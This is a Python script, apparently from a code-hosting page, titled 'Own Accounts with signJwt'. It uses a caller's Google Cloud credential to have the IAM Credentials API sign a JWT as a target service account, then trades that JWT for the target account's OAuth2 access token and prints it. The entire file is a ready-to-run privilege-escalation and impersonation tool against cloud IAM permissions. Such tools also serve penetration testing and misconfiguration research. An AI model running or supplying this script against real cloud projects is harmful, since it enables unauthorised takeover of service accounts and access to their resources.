1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
|
#!/usr/bin/env python3
import argparse
import json
import sys
from datetime import datetime, timedelta

import google.auth.transport.requests
import requests
from google.oauth2 import service_account
def getTokenFromKeyFile(file_name):
    """Return an OAuth2 access token obtained from a service-account key file.

    Args:
        file_name: Path to the service-account JSON key file.

    Returns:
        The ``token`` attribute of the credentials after they have been
        refreshed with the ``cloud-platform`` scope.
    """
    credentials = service_account.Credentials.from_service_account_file(
        file_name,
        scopes=["https://www.googleapis.com/auth/cloud-platform"],
    )
    # The token attribute is read only after refresh() has run against the
    # HTTP transport.
    credentials.refresh(google.auth.transport.requests.Request())
    return credentials.token
def getJwt(service_account_email, token):
    """Ask the IAM Credentials API to sign a JWT as the given service account.

    Builds a JWT claim set with ``service_account_email`` as issuer, the
    ``cloud-platform`` scope, the Google OAuth2 token endpoint as audience and
    a one-hour lifetime, then posts it to the ``signJwt`` endpoint using
    ``token`` as the caller's bearer credential.

    Args:
        service_account_email: Email of the service account to sign as.
        token: Access token of the caller, sent in the Authorization header.

    Returns:
        The ``signedJwt`` string from the API response.

    Raises:
        SystemExit: With status 1 when the API answers with a non-200 status.
        requests.exceptions.RequestException: On connection errors or when
            the request exceeds the timeout.
    """
    now = int(datetime.now().timestamp())
    payload = {
        "iss": service_account_email,
        "scope": "https://www.googleapis.com/auth/cloud-platform",
        "aud": "https://oauth2.googleapis.com/token",
        "iat": now,
        "exp": now + 3600,
    }
    # signJwt expects the claim set as a JSON-encoded *string* in "payload".
    body = {
        "payload": json.dumps(payload)
    }
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "Application/json"
    }
    signJwt_url = f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{service_account_email}:signJwt"
    # Without a timeout, requests waits forever on an unresponsive endpoint.
    r = requests.post(signJwt_url, json=body, headers=headers, timeout=30)
    if r.status_code != 200:
        print(f"[!] Signing Request failed (Status {r.status_code}): {r.text}")
        sys.exit(1)
    return r.json()['signedJwt']
def getAccessToken(service_account_email, token):
    """Exchange a JWT signed as the target account for an OAuth2 access token.

    Obtains a signed JWT through ``getJwt`` and posts it to the Google OAuth2
    token endpoint using the JWT-bearer grant type.

    Args:
        service_account_email: Email of the target service account.
        token: Access token of the caller, forwarded to ``getJwt``.

    Returns:
        The decoded JSON response of the token endpoint on HTTP 200,
        otherwise ``None`` (after printing the failing status and body).

    Raises:
        requests.exceptions.RequestException: On connection errors or when
            the request exceeds the timeout.
    """
    assertion = getJwt(service_account_email, token)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    body = {
        "assertion": assertion,
        "grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
    }
    token_url = "https://oauth2.googleapis.com/token"
    # Without a timeout, requests waits forever on an unresponsive endpoint.
    r = requests.post(token_url, data=body, headers=headers, timeout=30)
    if r.status_code == 200:
        return r.json()
    # Report the rejection instead of returning None silently, so the caller
    # is not left without any diagnostic.
    print(f"[!] Token Request failed (Status {r.status_code}): {r.text}")
    return None
def main():
    """Command-line entry point.

    Parses the arguments, resolves the caller's access token from exactly one
    of ``--token``, ``--token-file`` or ``--key-file``, then requests an
    access token for ``--target-account`` via ``getAccessToken`` and prints
    the result as indented JSON.

    Raises:
        SystemExit: With status 1 when no caller token could be obtained or
            when the access token for the target account could not be
            retrieved.
    """
    parser = argparse.ArgumentParser(
        description="Own Accounts with signJwt"
    )
    # Exactly one source for the caller's credential must be given.
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-t", "--token", help="Caller's Access Token String")
    group.add_argument("-f", "--token-file", help="Path to file containg Access Token")
    group.add_argument("-k", "--key-file", help="Path to Service Account JSON key file")
    parser.add_argument("-s", "--target-account", help="Target Service Account Email", required=True)
    args = parser.parse_args()

    token = None
    if args.token:
        token = args.token
    elif args.token_file:
        with open(args.token_file, 'r') as f:
            token = f.read().strip()
    elif args.key_file:
        token = getTokenFromKeyFile(args.key_file)
    if not token:
        print("[!] Could not retrieve a valid caller token")
        sys.exit(1)

    # argparse enforces required=True, so the option is always present here.
    service_account_email = args.target_account

    print("[*] Getting Access Token")
    try:
        access_token = getAccessToken(service_account_email, token)
    except Exception as e:
        # Include the underlying error; the bare message alone hides the cause.
        print(f"[!] An error occured while retrieving access_token for {service_account_email}: {e}")
        sys.exit(1)

    if not access_token:
        # getAccessToken returned nothing: signal the failure through the
        # exit status instead of ending silently with status 0.
        print(f"[!] No access_token was returned for {service_account_email}")
        sys.exit(1)

    print(f"[*] Successfully retrieved access_token for {service_account_email}")
    print(json.dumps(access_token, indent=2))
# Run the command-line interface only when this file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()
|